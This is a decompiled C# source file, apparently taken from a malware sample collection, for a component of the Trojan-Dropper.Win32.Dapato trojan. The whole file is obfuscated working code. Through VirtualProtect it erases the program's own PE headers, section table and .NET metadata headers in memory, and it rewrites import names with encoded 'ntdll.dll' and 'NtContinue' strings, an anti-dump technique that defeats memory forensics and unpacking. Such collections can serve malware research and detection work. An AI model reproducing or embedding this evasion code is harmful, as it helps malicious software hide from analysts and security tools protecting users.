MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e/�鞇ᛰ퓹鈠.cs

// Decompiled with JetBrains decompiler
// Type: <20>鞇ᛰ퓹鈠
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe

using System;
using System.Runtime.InteropServices;

internal static class \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠
{
  [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
  private static extern unsafe bool ऄ㕎\uF623諜펤犬ⅈ᥆(
    byte* lpAddress,
    int dwSize,
    uint flNewProtect,
    out uint lpflOldProtect);

  public static unsafe void ᕔ祩晾怏\uFFFD\uFFFD\uF888㩟()
  {
    byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module);
    byte* numPtr1 = hinstance + 60;
    byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6;
    ushort length = *(ushort*) numPtr2;
    byte* numPtr3 = numPtr2 + 14;
    ushort num1 = *(ushort*) numPtr3;
    byte* numPtr4 = numPtr3 + 4 + (int) num1;
    // ISSUE: untyped stack allocation
    byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11));
    *(int*) numPtr5 = 1818522734;
    *(int*) (numPtr5 + 4) = 1818504812;
    *(short*) (numPtr5 + 8) = (short) 108;
    numPtr5[10] = (byte) 0;
    // ISSUE: untyped stack allocation
    byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11));
    *(int*) numPtr6 = 1866691662;
    *(int*) (numPtr6 + 4) = 1852404846;
    *(short*) (numPtr6 + 8) = (short) 25973;
    numPtr6[10] = (byte) 0;
    if (typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module.FullyQualifiedName != "<Unknown>")
    {
      uint lpflOldProtect;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect);
      *(int*) (numPtr4 - 12) = 0;
      byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16);
      *(int*) (numPtr4 - 16) = 0;
      if (*(uint*) (numPtr4 - 120) != 0U)
        goto label_41;
label_25:
      for (int index = 0; index < (int) length; index++)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect);
        Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
        numPtr4 += 40;
      }
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress1, 72, 64U, out lpflOldProtect);
      byte* lpAddress2 = hinstance + (int) *(uint*) (lpAddress1 + 8);
      *(int*) lpAddress1 = 0;
      *(int*) (lpAddress1 + 4) = 0;
      *(int*) (lpAddress1 + 8) = 0;
      *(int*) (lpAddress1 + 12) = 0;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress2, 4, 64U, out lpflOldProtect);
      *(int*) lpAddress2 = 0;
      byte* numPtr7 = lpAddress2 + 12;
      byte* numPtr8 = (byte*) ((ulong) ((uint) (numPtr7 + (int) *(uint*) numPtr7) + 7U) & 18446744073709551612UL) + 2;
      ushort num2 = (ushort) *numPtr8;
      byte* lpAddress3 = numPtr8 + 2;
      for (int index1 = 0; index1 < (int) num2; index1++)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 8, 64U, out lpflOldProtect);
        *(int*) lpAddress3 = 0;
        byte* numPtr9 = lpAddress3 + 4;
        *(int*) numPtr9 = 0;
        lpAddress3 = numPtr9 + 4;
        for (int index2 = 0; index2 < 8; index2++)
        {
          \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 4, 64U, out lpflOldProtect);
          *lpAddress3 = (byte) 0;
          byte* numPtr10 = lpAddress3 + 1;
          if (*numPtr10 == (byte) 0)
          {
            lpAddress3 = numPtr10 + 3;
            break;
          }
          *numPtr10 = (byte) 0;
          byte* numPtr11 = numPtr10 + 1;
          if (*numPtr11 == (byte) 0)
          {
            lpAddress3 = numPtr11 + 2;
            break;
          }
          *numPtr11 = (byte) 0;
          byte* numPtr12 = numPtr11 + 1;
          if (*numPtr12 == (byte) 0)
          {
            lpAddress3 = numPtr12 + 1;
            break;
          }
          *numPtr12 = (byte) 0;
          lpAddress3 = numPtr12 + 1;
        }
      }
      return;
label_41:
      byte* numPtr13 = hinstance + (int) *(uint*) (numPtr4 - 120);
      byte* numPtr14 = hinstance + (int) *(uint*) numPtr13;
      byte* lpAddress4 = hinstance + (int) *(uint*) (numPtr13 + 12);
      byte* lpAddress5 = hinstance + (int) *(uint*) numPtr14 + 2;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress4, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; ++index)
        lpAddress4[index] = numPtr5[index];
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress5, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; index++)
        lpAddress5[index] = numPtr6[index];
      goto label_25;
    }
    else
    {
      uint lpflOldProtect;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect);
      *(int*) (numPtr4 - 12) = 0;
      uint num3 = *(uint*) (numPtr4 - 16);
      *(int*) (numPtr4 - 16) = 0;
      uint num4 = *(uint*) (numPtr4 - 120);
      uint[] numArray1 = new uint[(int) length];
      uint[] numArray2 = new uint[(int) length];
      uint[] numArray3 = new uint[(int) length];
      for (int index = 0; index < (int) length; ++index)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect);
        Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
        numArray1[index] = *(uint*) (numPtr4 + 12);
        numArray2[index] = *(uint*) (numPtr4 + 8);
        numArray3[index] = *(uint*) (numPtr4 + 20);
        numPtr4 += 40;
      }
      if (num4 != 0U)
        goto label_4;
label_2:
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index])
        {
          num3 = num3 - numArray1[index] + numArray3[index];
          break;
        }
      }
      byte* lpAddress6 = hinstance + (int) num3;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress6, 72, 64U, out lpflOldProtect);
      uint num5 = *(uint*) (lpAddress6 + 8);
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index])
        {
          num5 = num5 - numArray1[index] + numArray3[index];
          break;
        }
      }
      *(int*) lpAddress6 = 0;
      *(int*) (lpAddress6 + 4) = 0;
      *(int*) (lpAddress6 + 8) = 0;
      *(int*) (lpAddress6 + 12) = 0;
      byte* lpAddress7 = hinstance + (int) num5;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress7, 4, 64U, out lpflOldProtect);
      *(int*) lpAddress7 = 0;
      byte* numPtr15 = lpAddress7 + 12;
      byte* numPtr16 = (byte*) ((ulong) ((uint) (numPtr15 + (int) *(uint*) numPtr15) + 7U) & 18446744073709551612UL) + 2;
      ushort num6 = (ushort) *numPtr16;
      byte* lpAddress8 = numPtr16 + 2;
      for (int index3 = 0; index3 < (int) num6; ++index3)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 8, 64U, out lpflOldProtect);
        *(int*) lpAddress8 = 0;
        byte* numPtr17 = lpAddress8 + 4;
        *(int*) numPtr17 = 0;
        lpAddress8 = numPtr17 + 4;
        for (int index4 = 0; index4 < 8; ++index4)
        {
          \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 4, 64U, out lpflOldProtect);
          *lpAddress8 = (byte) 0;
          byte* numPtr18 = lpAddress8 + 1;
          if (*numPtr18 == (byte) 0)
          {
            lpAddress8 = numPtr18 + 3;
            break;
          }
          *numPtr18 = (byte) 0;
          byte* numPtr19 = numPtr18 + 1;
          if (*numPtr19 != (byte) 0)
          {
            *numPtr19 = (byte) 0;
            byte* numPtr20 = numPtr19 + 1;
            if (*numPtr20 != (byte) 0)
            {
              *numPtr20 = (byte) 0;
              lpAddress8 = numPtr20 + 1;
            }
            else
            {
              lpAddress8 = numPtr20 + 1;
              break;
            }
          }
          else
          {
            lpAddress8 = numPtr19 + 2;
            break;
          }
        }
      }
      return;
label_4:
      for (int index = 0; index < (int) length; ++index)
      {
        if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index])
        {
          num4 = num4 - numArray1[index] + numArray3[index];
          break;
        }
      }
      byte* numPtr21 = hinstance + (int) num4;
      uint num7 = *(uint*) numPtr21;
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index])
        {
          num7 = num7 - numArray1[index] + numArray3[index];
          break;
        }
      }
      byte* numPtr22 = hinstance + (int) num7;
      uint num8 = *(uint*) (numPtr21 + 12);
      for (int index = 0; index < (int) length; ++index)
      {
        if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index])
        {
          num8 = num8 - numArray1[index] + numArray3[index];
          break;
        }
      }
      uint num9 = *(uint*) numPtr22 + 2U;
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num9 && num9 < numArray1[index] + numArray2[index])
        {
          num9 = num9 - numArray1[index] + numArray3[index];
          break;
        }
      }
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num8, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; ++index)
        (hinstance + (int) num8)[index] = numPtr5[index];
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num9, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; index++)
        (hinstance + (int) num9)[index] = numPtr6[index];
      goto label_2;
    }
  }
}